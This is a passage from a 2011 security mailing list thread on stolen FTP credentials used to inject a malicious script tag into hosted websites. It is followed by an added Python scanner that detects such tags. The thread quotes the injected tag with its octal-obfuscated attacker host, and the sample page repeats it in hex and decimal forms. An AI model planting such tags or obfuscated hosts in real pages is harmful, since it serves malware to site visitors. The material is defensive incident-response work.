[nsp-sec] Stolen FTP credentials

Smith, Donald Donald.Smith at qwest.com
Wed Mar 16 12:33:38 EDT 2011


Can we share the inserted text with our customers so they can look for it?


Sharing: Author's permission required.
Donald.Smith at qwest.com


> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-
> bounces at puck.nether.net] On Behalf Of Carles Fragoso
> Sent: Wednesday, March 16, 2011 9:50 AM
> To: Thomas Hungenberg
> Cc: nsp-sec NSP
> Subject: Re: [nsp-sec] Stolen FTP credentials
>
> ----------- nsp-security Confidential --------
>
> Hi Thomas,
>
> Several ISPs here in Spain have confirmed this behaviour to us ...
>
> ... same inserted script ...
>
> < script src='hxxp://0133.0331.0242.0034/0314.php?js'>< / script >
>
> ... performed through FTP connections (downloading index file and
> uploading it with modified code) from a couple of different IP
> addresses (Romania and USA).
>
> Those who have replied to my notification have confirmed that the
> credentials were fresh and were accessed.
>
> Regards,
>
> -- Carlos Fragoso (CESICAT-CERT)
>
> On Mar 16, 2011, at 4:16 PM, Thomas Hungenberg wrote:
>
> ----------- nsp-security Confidential --------
>
>
> It appears the stolen FTP credentials are used to inject the following
> code
> into corresponding websites (XXX inserted):
> <scrXXipt src='htXXXtp://0133.0331.0242.0034/0314.php?js'></scrXXXipt>
>
> 0133.0331.0242.0034 = 91.217.162.28
>
> Known rogue netblock:
>
> inetnum:        91.217.162.0 - 91.217.162.255
> netname:        VOEJNA-NET
> descr:          Voejkova Nadezhda
> country:        UA
>
> Cheers,
> Thomas
>
> Thomas Hungenberg schrieb:
> ----------- nsp-security Confidential --------
>
> Hi,
>
> please find below a list of stolen FTP credentials found in recent
> dropzone data.
>
> Format: ASN | IP | CC | hostname | username | sanitized password
>
>
>     - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-
> security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
>
>
>

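As an added example (not part of this thread and not tooling from any of the posters), the following Python script normalises the octal-dotted host in the injected tag to the address Thomas gives and scans an index file for script tags whose src resolves into the VOEJNA-NET block, which is the check a hosting customer would run over a web root. It goes beyond the thread's single case by also accepting hex and plain-integer dotted forms, which browsers resolve the same way. The rogue netblock list, the sample index page and the function names are assumptions made for this example, and only IP-literal hosts are checked; a hostname would need DNS resolution.

```python
import ipaddress
import re
import sys

# Netblock named in the thread (RIPE object VOEJNA-NET); extend as needed.
ROGUE_NETS = [ipaddress.ip_network("91.217.162.0/24")]

_SCRIPT_SRC = re.compile(r"<\s*script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)
_HOST = re.compile(r"^(?:[a-z]+:)?//([^/?#:]+)", re.IGNORECASE)
_PART = re.compile(r"0x[0-9a-f]+|[0-9]+", re.IGNORECASE)


def parse_dotted_host(host):
    """Return an IPv4Address for a host written as an IP literal, or None.

    Each part may be decimal, octal (leading 0, as in the injected tag) or
    hex (0x).  inet_aton-style short forms with 1 to 3 parts are accepted
    too, because browsers resolve them; anything that is not a literal
    (e.g. a domain name, or an invalid octal part like "08") gives None.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    vals = []
    for p in parts:
        if not _PART.fullmatch(p):
            return None
        try:
            if p.lower().startswith("0x"):
                v = int(p[2:], 16)
            elif len(p) > 1 and p.startswith("0"):
                v = int(p, 8)
            else:
                v = int(p, 10)
        except ValueError:
            return None
        vals.append(v)
    # inet_aton semantics: every part but the last is one octet, the last
    # part fills all remaining octets.
    n = 0
    for v in vals[:-1]:
        if v > 0xFF:
            return None
        n = (n << 8) | v
    remaining_bits = 8 * (4 - (len(vals) - 1))
    if vals[-1] >= (1 << remaining_bits):
        return None
    return ipaddress.IPv4Address((n << remaining_bits) | vals[-1])


def find_rogue_scripts(html):
    """Return (src, resolved_ip) for every <script src=...> in html whose
    host is an IP literal inside one of ROGUE_NETS."""
    hits = []
    for m in _SCRIPT_SRC.finditer(html):
        src = m.group(1)
        hm = _HOST.match(src)
        if not hm:
            continue  # relative src, nothing to resolve
        ip = parse_dotted_host(hm.group(1))
        if ip is None:
            continue  # hostname rather than an IP literal; not checked here
        if any(ip in net for net in ROGUE_NETS):
            hits.append((src, str(ip)))
    return hits


# Constructed sample of a modified index page: one octal, one hex and one
# plain-decimal reference to 91.217.162.28, plus two benign scripts.
SAMPLE_INDEX = """<html><head><title>Example shop</title>
<script src='/js/site.js'></script>
<script src='http://0133.0331.0242.0034/0314.php?js'></script>
<script src="//0x5b.0xd9.0xa2.0x1c/x.js"></script>
<script src="http://91.217.162.28/a.js"></script>
<script src="http://198.51.100.7/ok.js"></script>
</head><body>...</body></html>"""


if __name__ == "__main__":
    # Usage: python scan.py index.html [more files...]; with no arguments
    # the constructed sample above is scanned.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, encoding="utf-8", errors="replace") as fh:
                for src, ip in find_rogue_scripts(fh.read()):
                    print(f"{path}: {src} -> {ip}")
    else:
        for src, ip in find_rogue_scripts(SAMPLE_INDEX):
            print(f"{src} -> {ip}")
```

The octal tag from the thread is caught together with the hex and decimal spellings of the same address, while a script on an unrelated address is ignored, so the list of rogue networks can be shared with customers without them having to know every notation the attacker might use.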